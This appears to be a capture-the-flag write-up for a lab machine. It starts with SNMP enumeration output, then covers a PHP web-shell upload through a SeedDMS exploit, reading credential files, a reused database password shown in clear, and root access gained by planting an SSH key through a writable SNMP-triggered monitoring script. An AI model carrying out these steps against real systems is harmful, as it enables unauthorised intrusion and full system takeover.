.1.3.6.1.2.1.25.4.2.1.2.565 = STRING: "scsi_eh_18"
.1.3.6.1.2.1.25.4.2.1.2.566 = STRING: "scsi_tmf_18"
.1.3.6.1.2.1.25.4.2.1.2.567 = STRING: "scsi_eh_19"
.1.3.6.1.2.1.25.4.2.1.2.568 = STRING: "scsi_tmf_19"
.1.3.6.1.2.1.25.4.2.1.2.569 = STRING: "scsi_eh_20"
.1.3.6.1.2.1.25.4.2.1.2.570 = STRING: "scsi_tmf_20"
.1.3.6.1.2.1.25.4.2.1.2.571 = STRING: "scsi_eh_21"
.1.3.6.1.2.1.25.4.2.1.2.572 = STRING: "scsi_tmf_21"
.1.3.6.1.2.1.25.4.2.1.2.573 = STRING: "scsi_eh_22"
.1.3.6.1.2.1.25.4.2.1.2.574 = STRING: "scsi_tmf_22"
.1.3.6.1.2.1.25.4.2.1.2.575 = STRING: "scsi_eh_23"
.1.3.6.1.2.1.25.4.2.1.2.576 = STRING: "scsi_tmf_23"
.1.3.6.1.2.1.25.4.2.1.2.577 = STRING: "scsi_eh_24"
.1.3.6.1.2.1.25.4.2.1.2.578 = STRING: "scsi_tmf_24"
.1.3.6.1.2.1.25.4.2.1.2.579 = STRING: "scsi_eh_25"
.1.3.6.1.2.1.25.4.2.1.2.580 = STRING: "scsi_tmf_25"
.1.3.6.1.2.1.25.4.2.1.2.581 = STRING: "scsi_eh_26"
.1.3.6.1.2.1.25.4.2.1.2.582 = STRING: "scsi_tmf_26"
.1.3.6.1.2.1.25.4.2.1.2.583 = STRING: "scsi_eh_27"
.1.3.6.1.2.1.25.4.2.1.2.584 = STRING: "scsi_tmf_27"
.1.3.6.1.2.1.25.4.2.1.2.585 = STRING: "scsi_eh_28"
.1.3.6.1.2.1.25.4.2.1.2.586 = STRING: "scsi_tmf_28"
.1.3.6.1.2.1.25.4.2.1.2.587 = STRING: "scsi_eh_29"
.1.3.6.1.2.1.25.4.2.1.2.588 = STRING: "scsi_tmf_29"
.1.3.6.1.2.1.25.4.2.1.2.589 = STRING: "scsi_eh_30"
.1.3.6.1.2.1.25.4.2.1.2.590 = STRING: "scsi_tmf_30"
.1.3.6.1.2.1.25.4.2.1.2.628 = STRING: "kworker/1:1H-kblockd"
.1.3.6.1.2.1.25.4.2.1.2.643 = STRING: "scsi_eh_31"
.1.3.6.1.2.1.25.4.2.1.2.645 = STRING: "scsi_tmf_31"
.1.3.6.1.2.1.25.4.2.1.2.647 = STRING: "scsi_eh_32"
.1.3.6.1.2.1.25.4.2.1.2.648 = STRING: "scsi_tmf_32"
.1.3.6.1.2.1.25.4.2.1.2.685 = STRING: "kdmflush"
.1.3.6.1.2.1.25.4.2.1.2.694 = STRING: "kdmflush"
.1.3.6.1.2.1.25.4.2.1.2.719 = STRING: "xfsalloc"
.1.3.6.1.2.1.25.4.2.1.2.720 = STRING: "xfs_mru_cache"
.1.3.6.1.2.1.25.4.2.1.2.727 = STRING: "xfs-buf/dm-0"
.1.3.6.1.2.1.25.4.2.1.2.732 = STRING: "xfs-conv/dm-0"
.1.3.6.1.2.1.25.4.2.1.2.733 = STRING: "xfs-cil/dm-0"
.1.3.6.1.2.1.25.4.2.1.2.734 = STRING: "xfs-reclaim/dm-"
.1.3.6.1.2.1.25.4.2.1.2.735 = STRING: "xfs-eofblocks/d"
.1.3.6.1.2.1.25.4.2.1.2.736 = STRING: "xfs-log/dm-0"
.1.3.6.1.2.1.25.4.2.1.2.737 = STRING: "xfsaild/dm-0"
.1.3.6.1.2.1.25.4.2.1.2.738 = STRING: "kworker/0:1H-kblockd"
.1.3.6.1.2.1.25.4.2.1.2.834 = STRING: "systemd-journal"
.1.3.6.1.2.1.25.4.2.1.2.867 = STRING: "systemd-udevd"
.1.3.6.1.2.1.25.4.2.1.2.931 = STRING: "kdmflush"
.1.3.6.1.2.1.25.4.2.1.2.944 = STRING: "xfs-buf/dm-2"
.1.3.6.1.2.1.25.4.2.1.2.945 = STRING: "xfs-conv/dm-2"
.1.3.6.1.2.1.25.4.2.1.2.946 = STRING: "xfs-cil/dm-2"
.1.3.6.1.2.1.25.4.2.1.2.947 = STRING: "xfs-reclaim/dm-"
.1.3.6.1.2.1.25.4.2.1.2.948 = STRING: "xfs-eofblocks/d"
.1.3.6.1.2.1.25.4.2.1.2.949 = STRING: "xfs-log/dm-2"
.1.3.6.1.2.1.25.4.2.1.2.950 = STRING: "xfsaild/dm-2"
.1.3.6.1.2.1.25.4.2.1.2.960 = STRING: "jbd2/sda1-8"
.1.3.6.1.2.1.25.4.2.1.2.961 = STRING: "ext4-rsv-conver"
.1.3.6.1.2.1.25.4.2.1.2.986 = STRING: "auditd"
.1.3.6.1.2.1.25.4.2.1.2.988 = STRING: "sedispatch"
.1.3.6.1.2.1.25.4.2.1.2.1021 = STRING: "sssd"
.1.3.6.1.2.1.25.4.2.1.2.1022 = STRING: "VGAuthService"
.1.3.6.1.2.1.25.4.2.1.2.1023 = STRING: "vmtoolsd"
.1.3.6.1.2.1.25.4.2.1.2.1024 = STRING: "polkitd"
.1.3.6.1.2.1.25.4.2.1.2.1025 = STRING: "irqbalance"
.1.3.6.1.2.1.25.4.2.1.2.1029 = STRING: "dbus-daemon"
.1.3.6.1.2.1.25.4.2.1.2.1034 = STRING: "chronyd"
.1.3.6.1.2.1.25.4.2.1.2.1044 = STRING: "rngd"
.1.3.6.1.2.1.25.4.2.1.2.1055 = STRING: "sssd_be"
.1.3.6.1.2.1.25.4.2.1.2.1068 = STRING: "sssd_nss"
.1.3.6.1.2.1.25.4.2.1.2.1076 = STRING: "firewalld"
.1.3.6.1.2.1.25.4.2.1.2.1100 = STRING: "systemd-logind"
.1.3.6.1.2.1.25.4.2.1.2.1101 = STRING: "NetworkManager"
.1.3.6.1.2.1.25.4.2.1.2.1115 = STRING: "tuned"
.1.3.6.1.2.1.25.4.2.1.2.1118 = STRING: "sshd"
.1.3.6.1.2.1.25.4.2.1.2.1139 = STRING: "crond"
.1.3.6.1.2.1.25.4.2.1.2.1180 = STRING: "agetty"
.1.3.6.1.2.1.25.4.2.1.2.1188 = STRING: "nginx"
.1.3.6.1.2.1.25.4.2.1.2.1189 = STRING: "nginx"
.1.3.6.1.2.1.25.4.2.1.2.1190 = STRING: "nginx"
.1.3.6.1.2.1.25.4.2.1.2.1233 = STRING: "mysqld"
.1.3.6.1.2.1.25.4.2.1.2.1467 = STRING: "snmpd"
.1.3.6.1.2.1.25.4.2.1.2.1469 = STRING: "rsyslogd"
.1.3.6.1.2.1.25.4.2.1.2.24958 = STRING: "kworker/0:2-cgroup_pidlist_destroy"
.1.3.6.1.2.1.25.4.2.1.2.25154 = STRING: "kworker/u4:2-events_unbound"
.1.3.6.1.2.1.25.4.2.1.2.25157 = STRING: "kworker/1:3-memcg_kmem_cache"
.1.3.6.1.2.1.25.4.2.1.2.25160 = STRING: "kworker/1:4-cgroup_destroy"
.1.3.6.1.2.1.25.4.2.1.2.25174 = STRING: "anacron"
.1.3.6.1.2.1.25.4.2.1.2.25185 = STRING: "kworker/0:3-mm_percpu_wq"
.1.3.6.1.2.1.25.4.2.1.2.25214 = STRING: "kworker/0:5-events"
.1.3.6.1.2.1.25.4.2.1.2.25255 = STRING: "kworker/1:0-events_power_efficient"
.1.3.6.1.2.1.25.4.2.1.2.25296 = STRING: "kworker/u4:1-flush-253:0"
.1.3.6.1.2.1.25.4.2.1.2.25304 = STRING: "kworker/0:0-events"
.1.3.6.1.2.1.25.4.2.1.2.25318 = STRING: "kworker/1:1-cgroup_pidlist_destroy"
.1.3.6.1.2.1.25.4.2.1.2.25331 = STRING: "php-fpm"
.1.3.6.1.2.1.25.4.2.1.2.25332 = STRING: "php-fpm"
.1.3.6.1.2.1.25.4.2.1.2.25333 = STRING: "php-fpm"
.1.3.6.1.2.1.25.4.2.1.2.25334 = STRING: "php-fpm"
.1.3.6.1.2.1.25.4.2.1.2.25335 = STRING: "php-fpm"
.1.3.6.1.2.1.25.4.2.1.2.25336 = STRING: "php-fpm"
.1.3.6.1.2.1.25.4.2.1.2.25347 = STRING: "php-fpm"
.1.3.6.1.2.1.25.4.2.1.2.25361 = STRING: "php-fpm"

[...]

.1.3.6.1.2.1.25.4.2.1.4.986 = STRING: "/sbin/auditd"
.1.3.6.1.2.1.25.4.2.1.4.988 = STRING: "/usr/sbin/sedispatch"
.1.3.6.1.2.1.25.4.2.1.4.1021 = STRING: "/usr/sbin/sssd"
.1.3.6.1.2.1.25.4.2.1.4.1022 = STRING: "/usr/bin/VGAuthService"
.1.3.6.1.2.1.25.4.2.1.4.1023 = STRING: "/usr/bin/vmtoolsd"
.1.3.6.1.2.1.25.4.2.1.4.1024 = STRING: "/usr/lib/polkit-1/polkitd"
.1.3.6.1.2.1.25.4.2.1.4.1025 = STRING: "/usr/sbin/irqbalance"
.1.3.6.1.2.1.25.4.2.1.4.1029 = STRING: "/usr/bin/dbus-daemon"
.1.3.6.1.2.1.25.4.2.1.4.1034 = STRING: "/usr/sbin/chronyd"
.1.3.6.1.2.1.25.4.2.1.4.1044 = STRING: "/sbin/rngd"
.1.3.6.1.2.1.25.4.2.1.4.1055 = STRING: "/usr/libexec/sssd/sssd_be"
.1.3.6.1.2.1.25.4.2.1.4.1068 = STRING: "/usr/libexec/sssd/sssd_nss"
.1.3.6.1.2.1.25.4.2.1.4.1076 = STRING: "/usr/libexec/platform-python"
.1.3.6.1.2.1.25.4.2.1.4.1100 = STRING: "/usr/lib/systemd/systemd-logind"
.1.3.6.1.2.1.25.4.2.1.4.1101 = STRING: "/usr/sbin/NetworkManager"
.1.3.6.1.2.1.25.4.2.1.4.1115 = STRING: "/usr/libexec/platform-python"
.1.3.6.1.2.1.25.4.2.1.4.1118 = STRING: "/usr/sbin/sshd"
.1.3.6.1.2.1.25.4.2.1.4.1139 = STRING: "/usr/sbin/crond"
.1.3.6.1.2.1.25.4.2.1.4.1180 = STRING: "/sbin/agetty"
.1.3.6.1.2.1.25.4.2.1.4.1188 = STRING: "nginx: master process /usr/sbin/nginx"
.1.3.6.1.2.1.25.4.2.1.4.1189 = STRING: "nginx: worker process"
.1.3.6.1.2.1.25.4.2.1.4.1190 = STRING: "nginx: worker process"
.1.3.6.1.2.1.25.4.2.1.4.1233 = STRING: "/usr/libexec/mysqld"
.1.3.6.1.2.1.25.4.2.1.4.1467 = STRING: "/usr/sbin/snmpd"
.1.3.6.1.2.1.25.4.2.1.4.1469 = STRING: "/usr/sbin/rsyslogd"
.1.3.6.1.2.1.25.4.2.1.4.24958 = ""
.1.3.6.1.2.1.25.4.2.1.4.25154 = ""
.1.3.6.1.2.1.25.4.2.1.4.25157 = ""
.1.3.6.1.2.1.25.4.2.1.4.25160 = ""
.1.3.6.1.2.1.25.4.2.1.4.25174 = STRING: "/usr/sbin/anacron"

[...]

.1.3.6.1.2.1.25.4.2.1.5.988 = ""
.1.3.6.1.2.1.25.4.2.1.5.1021 = STRING: "-i --logger=files"
.1.3.6.1.2.1.25.4.2.1.5.1022 = STRING: "-s"
.1.3.6.1.2.1.25.4.2.1.5.1023 = ""
.1.3.6.1.2.1.25.4.2.1.5.1024 = STRING: "--no-debug"
.1.3.6.1.2.1.25.4.2.1.5.1025 = STRING: "--foreground"
.1.3.6.1.2.1.25.4.2.1.5.1029 = STRING: "--system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only"
.1.3.6.1.2.1.25.4.2.1.5.1034 = ""
.1.3.6.1.2.1.25.4.2.1.5.1044 = STRING: "-f --fill-watermark=0"
.1.3.6.1.2.1.25.4.2.1.5.1055 = STRING: "--domain implicit_files --uid 0 --gid 0 --logger=files"
.1.3.6.1.2.1.25.4.2.1.5.1068 = STRING: "--uid 0 --gid 0 --logger=files"
.1.3.6.1.2.1.25.4.2.1.5.1076 = STRING: "-s /usr/sbin/firewalld --nofork --nopid"
.1.3.6.1.2.1.25.4.2.1.5.1100 = ""
.1.3.6.1.2.1.25.4.2.1.5.1101 = STRING: "--no-daemon"
.1.3.6.1.2.1.25.4.2.1.5.1115 = STRING: "-Es /usr/sbin/tuned -l -P"
.1.3.6.1.2.1.25.4.2.1.5.1118 = STRING: "-D -oCiphers=aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes256-ctr,aes256-cbc,aes128-gcm@openssh.com,aes128-ctr,aes128"
.1.3.6.1.2.1.25.4.2.1.5.1139 = STRING: "-n"
.1.3.6.1.2.1.25.4.2.1.5.1180 = STRING: "-o -p -- \\u --noclear tty1 linux"
.1.3.6.1.2.1.25.4.2.1.5.1188 = ""
.1.3.6.1.2.1.25.4.2.1.5.1189 = ""
.1.3.6.1.2.1.25.4.2.1.5.1190 = ""
.1.3.6.1.2.1.25.4.2.1.5.1233 = STRING: "--basedir=/usr"
.1.3.6.1.2.1.25.4.2.1.5.1467 = STRING: "-LS0-6d -f"
.1.3.6.1.2.1.25.4.2.1.5.1469 = STRING: "-n"
.1.3.6.1.2.1.25.4.2.1.5.24958 = ""
.1.3.6.1.2.1.25.4.2.1.5.25154 = ""
.1.3.6.1.2.1.25.4.2.1.5.25157 = ""
.1.3.6.1.2.1.25.4.2.1.5.25160 = ""
.1.3.6.1.2.1.25.4.2.1.5.25174 = STRING: "-s"
.1.3.6.1.2.1.25.4.2.1.5.25185 = ""
[...]

.1.3.6.1.4.1.8072.1.3.2.2.1.2.10.109.111.110.105.116.111.114.105.110.103 = STRING: /usr/bin/monitor
.1.3.6.1.4.1.8072.1.3.2.2.1.3.10.109.111.110.105.116.111.114.105.110.103 = STRING: 
.1.3.6.1.4.1.8072.1.3.2.2.1.4.10.109.111.110.105.116.111.114.105.110.103 = STRING: 
.1.3.6.1.4.1.8072.1.3.2.2.1.5.10.109.111.110.105.116.111.114.105.110.103 = INTEGER: 5
.1.3.6.1.4.1.8072.1.3.2.2.1.6.10.109.111.110.105.116.111.114.105.110.103 = INTEGER: exec(1)
.1.3.6.1.4.1.8072.1.3.2.2.1.7.10.109.111.110.105.116.111.114.105.110.103 = INTEGER: run-on-read(1)
.1.3.6.1.4.1.8072.1.3.2.2.1.20.10.109.111.110.105.116.111.114.105.110.103 = INTEGER: permanent(4)
.1.3.6.1.4.1.8072.1.3.2.2.1.21.10.109.111.110.105.116.111.114.105.110.103 = INTEGER: active(1)
.1.3.6.1.4.1.8072.1.3.2.3.1.1.10.109.111.110.105.116.111.114.105.110.103 = STRING: Memory usage
.1.3.6.1.4.1.8072.1.3.2.3.1.2.10.109.111.110.105.116.111.114.105.110.103 = STRING: Memory usage
              total        used        free      shared  buff/cache   available
Mem:          3.8Gi       451Mi       3.0Gi        32Mi       356Mi       3.1Gi
Swap:         1.9Gi          0B       1.9Gi
Database status
OK - Connection to database successful.
System release info
CentOS Linux release 8.3.2011
SELinux Settings
user

                Labeling   MLS/       MLS/                          
SELinux User    Prefix     MCS Level  MCS Range                      SELinux Roles

guest_u         user       s0         s0                             guest_r
root            user       s0         s0-s0:c0.c1023                 staff_r sysadm_r system_r unconfined_r
staff_u         user       s0         s0-s0:c0.c1023                 staff_r sysadm_r unconfined_r
sysadm_u        user       s0         s0-s0:c0.c1023                 sysadm_r
system_u        user       s0         s0-s0:c0.c1023                 system_r unconfined_r
unconfined_u    user       s0         s0-s0:c0.c1023                 system_r unconfined_r
user_u          user       s0         s0                             user_r
xguest_u        user       s0         s0                             xguest_r
login

Login Name           SELinux User         MLS/MCS Range        Service

__default__          unconfined_u         s0-s0:c0.c1023       *
michelle             user_u               s0                   *
root                 unconfined_u         s0-s0:c0.c1023       *
System uptime
 03:24:53 up 1 day, 22:01,  0 users,  load average: 0.14, 0.06, 0.01
.1.3.6.1.4.1.8072.1.3.2.3.1.3.10.109.111.110.105.116.111.114.105.110.103 = INTEGER: 31
.1.3.6.1.4.1.8072.1.3.2.3.1.4.10.109.111.110.105.116.111.114.105.110.103 = INTEGER: 0
.1.3.6.1.4.1.8072.1.3.2.4.1.2.10.109.111.110.105.116.111.114.105.110.103.1 = STRING: Memory usage
.1.3.6.1.4.1.8072.1.3.2.4.1.2.10.109.111.110.105.116.111.114.105.110.103.2 = STRING:               total        used        free      shared  buff/cache   available
.1.3.6.1.4.1.8072.1.3.2.4.1.2.10.109.111.110.105.116.111.114.105.110.103.3 = STRING: Mem:          3.8Gi       451Mi       3.0Gi        32Mi       356Mi       3.1Gi
.1.3.6.1.4.1.8072.1.3.2.4.1.2.10.109.111.110.105.116.111.114.105.110.103.4 = STRING: Swap:         1.9Gi          0B       1.9Gi
.1.3.6.1.4.1.8072.1.3.2.4.1.2.10.109.111.110.105.116.111.114.105.110.103.5 = STRING: Database status
.1.3.6.1.4.1.8072.1.3.2.4.1.2.10.109.111.110.105.116.111.114.105.110.103.6 = STRING: OK - Connection to database successful.
.1.3.6.1.4.1.8072.1.3.2.4.1.2.10.109.111.110.105.116.111.114.105.110.103.7 = STRING: System release info
.1.3.6.1.4.1.8072.1.3.2.4.1.2.10.109.111.110.105.116.111.114.105.110.103.8 = STRING: CentOS Linux release 8.3.2011
.1.3.6.1.4.1.8072.1.3.2.4.1.2.10.109.111.110.105.116.111.114.105.110.103.9 = STRING: SELinux Settings
.1.3.6.1.4.1.8072.1.3.2.4.1.2.10.109.111.110.105.116.111.114.105.110.103.10 = STRING: user
.1.3.6.1.4.1.8072.1.3.2.4.1.2.10.109.111.110.105.116.111.114.105.110.103.11 = STRING: 
.1.3.6.1.4.1.8072.1.3.2.4.1.2.10.109.111.110.105.116.111.114.105.110.103.12 = STRING:                 Labeling   MLS/       MLS/                          
.1.3.6.1.4.1.8072.1.3.2.4.1.2.10.109.111.110.105.116.111.114.105.110.103.13 = STRING: SELinux User    Prefix     MCS Level  MCS Range                      SELinux Roles
.1.3.6.1.4.1.8072.1.3.2.4.1.2.10.109.111.110.105.116.111.114.105.110.103.14 = STRING: 
.1.3.6.1.4.1.8072.1.3.2.4.1.2.10.109.111.110.105.116.111.114.105.110.103.15 = STRING: guest_u         user       s0         s0                             guest_r
.1.3.6.1.4.1.8072.1.3.2.4.1.2.10.109.111.110.105.116.111.114.105.110.103.16 = STRING: root            user       s0         s0-s0:c0.c1023                 staff_r sysadm_r system_r unconfined_r
.1.3.6.1.4.1.8072.1.3.2.4.1.2.10.109.111.110.105.116.111.114.105.110.103.17 = STRING: staff_u         user       s0         s0-s0:c0.c1023                 staff_r sysadm_r unconfined_r
.1.3.6.1.4.1.8072.1.3.2.4.1.2.10.109.111.110.105.116.111.114.105.110.103.18 = STRING: sysadm_u        user       s0         s0-s0:c0.c1023                 sysadm_r
.1.3.6.1.4.1.8072.1.3.2.4.1.2.10.109.111.110.105.116.111.114.105.110.103.19 = STRING: system_u        user       s0         s0-s0:c0.c1023                 system_r unconfined_r
.1.3.6.1.4.1.8072.1.3.2.4.1.2.10.109.111.110.105.116.111.114.105.110.103.20 = STRING: unconfined_u    user       s0         s0-s0:c0.c1023                 system_r unconfined_r
.1.3.6.1.4.1.8072.1.3.2.4.1.2.10.109.111.110.105.116.111.114.105.110.103.21 = STRING: user_u          user       s0         s0                             user_r
.1.3.6.1.4.1.8072.1.3.2.4.1.2.10.109.111.110.105.116.111.114.105.110.103.22 = STRING: xguest_u        user       s0         s0                             xguest_r
.1.3.6.1.4.1.8072.1.3.2.4.1.2.10.109.111.110.105.116.111.114.105.110.103.23 = STRING: login
.1.3.6.1.4.1.8072.1.3.2.4.1.2.10.109.111.110.105.116.111.114.105.110.103.24 = STRING: 
.1.3.6.1.4.1.8072.1.3.2.4.1.2.10.109.111.110.105.116.111.114.105.110.103.25 = STRING: Login Name           SELinux User         MLS/MCS Range        Service
.1.3.6.1.4.1.8072.1.3.2.4.1.2.10.109.111.110.105.116.111.114.105.110.103.26 = STRING: 
.1.3.6.1.4.1.8072.1.3.2.4.1.2.10.109.111.110.105.116.111.114.105.110.103.27 = STRING: __default__          unconfined_u         s0-s0:c0.c1023       *
.1.3.6.1.4.1.8072.1.3.2.4.1.2.10.109.111.110.105.116.111.114.105.110.103.28 = STRING: michelle             user_u               s0                   *
.1.3.6.1.4.1.8072.1.3.2.4.1.2.10.109.111.110.105.116.111.114.105.110.103.29 = STRING: root                 unconfined_u         s0-s0:c0.c1023       *
.1.3.6.1.4.1.8072.1.3.2.4.1.2.10.109.111.110.105.116.111.114.105.110.103.30 = STRING: System uptime
.1.3.6.1.4.1.8072.1.3.2.4.1.2.10.109.111.110.105.116.111.114.105.110.103.31 = STRING:  03:24:53 up 1 day, 22:01,  0 users,  load average: 0.14, 0.06, 0.01
.1.3.6.1.4.1.8072.1.3.2.4.1.2.10.109.111.110.105.116.111.114.105.110.103.31 = No more variables left in this MIB View (It is past the end of the MIB tree)

We get user michelle from the output. We also get the path STRING: /var/www/html/seeddms51x/seeddms.

Port 9090

Adding the host info to hosts and visit the page.

Searching intext:"CentOS Linux" intext:" Reuse my password for remote connections"

Yields results which suggests that the software installed is called Cockpit.

Searchsploit shows that there is an unauthenticated CSRF vulnerability.

Foothold

With the identified exploit from searchsploit, we upload the php shell and then try to execute a command.

URI http://dms-pit.htb/seeddms51x/data/1048576/29/1.php?cmd=cat%20/etc/passwd

Attempted different techniques to get reverse shell but no success.

If we enumerate the directores with ls and try http://dms-pit.htb/seeddms51x/data/1048576/32/1.php?cmd=ls%20../../conf

we see the following files

settings.xml
settings.xml.template
stopwords.txt

We try http://dms-pit.htb/seeddms51x/data/1048576/33/1.php?cmd=cat ../../conf/settings.xml

Which only gives a blank screen. However, showing the source code shows that the browser doesn’t render the content as it is XML.

If we try http://dms-pit.htb/seeddms51x/data/1048576/35/1.php?cmd=cat /var/www/html/seeddms51x/conf/settings.xml

We see

    <database dbDriver="mysql" dbHostname="localhost" dbDatabase="seeddms" dbUser="seeddms" dbPass="ied^ieY6xoquu" doNotCheckVersion="false">
    </database>

mysql:ied^ieY6xoquu

This password works with the username michelle on port 9090.

Cockpit has a Terminal option which gives us an interactive shell.

Privesc

From the SNMPWalk output, we observe

NET-SNMP-EXTEND-MIB::nsExtendCommand."monitoring" = STRING: /usr/bin/monitor
NET-SNMP-EXTEND-MIB::nsExtendArgs."monitoring" = STRING: 
NET-SNMP-EXTEND-MIB::nsExtendInput."monitoring" = STRING: 
NET-SNMP-EXTEND-MIB::nsExtendCacheTime."monitoring" = INTEGER: 5
NET-SNMP-EXTEND-MIB::nsExtendExecType."monitoring" = INTEGER: exec(1)
NET-SNMP-EXTEND-MIB::nsExtendRunType."monitoring" = INTEGER: run-on-read(1)
NET-SNMP-EXTEND-MIB::nsExtendStorage."monitoring" = INTEGER: permanent(4)
NET-SNMP-EXTEND-MIB::nsExtendStatus."monitoring" = INTEGER: active(1)

NET-SNMP-EXTEND-MIB::nsExtendRunType."monitoring" = INTEGER: run-on-read(1) means that it will be executed when read.

Looking at the script

[michelle@pit ~]$ file /usr/bin/monitor 
/usr/bin/monitor: Bourne-Again shell script, ASCII text executable
[michelle@pit ~]$ cat /usr/bin/monitor 
#!/bin/bash

for script in /usr/local/monitoring/check*sh
do
    /bin/bash $script
done
[michelle@pit ~]$ 

We have write access to /usr/local/monitoring

[michelle@pit ~]$ getfacl /usr/local/monitoring/
getfacl: Removing leading '/' from absolute path names
# file: usr/local/monitoring/
# owner: root
# group: root
user::rwx
user:michelle:-wx
group::rwx
mask::rwx
other::---

[michelle@pit ~]$ 

So we create a script which will add our public key to ssh root.

echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDJIXrK0+yIpcNuqutXDRp36VMfPIB6R9tVZgO7NSy4OHE3xdAR6co4QwNSdGcdkebh5QDElzXxSwA9a5mxYBXsb5MBfyllSghDuwQy4bajxgECKoqnFml+ntApx4KS5nn2fLrls67VhoLJPnJN8XMtAON1ZbTw/hc3oifiX6lvEWZ8RS9q2nD4g3C5nPhRAoEbL07KmEZHwfhnWjWs4mfg5UOiUKpXu5f0X8z3yiO4SVW2KtX8vwXbFrWr1+5QaPYRqn3QnDjguil3VbXLtG1jdWohhXGBlPVGjvvTVwjquqWBEN2nNtIUUF8XKKO/oJvea++9KdATvJPp92MMgFyE5hSQDL24KRKp9xiVWGz1B3/HobiSKja+HmL2LfMK+0qZaMgjXshX6Q3WjBbGtPTH44P53k2dtlaCcRTFOCzdwXFX4B00VelkxvP1aSAlbkGVbCwAMyG2Bz+GVwn1As7KiES5ARz70o1QYCZUDlnm99nz/XiMW6/AR+nUKzK9VkE= bob@kali
" > /root/.ssh/authorized_keys

To trigger monitor through run-on-read(1) with snmpwalk we execute the cmdline

snmpwalk -m +MY-MIB -v2c -c public 10.10.10.241 nsExtendObjects

Subsequently we can ssh in as root.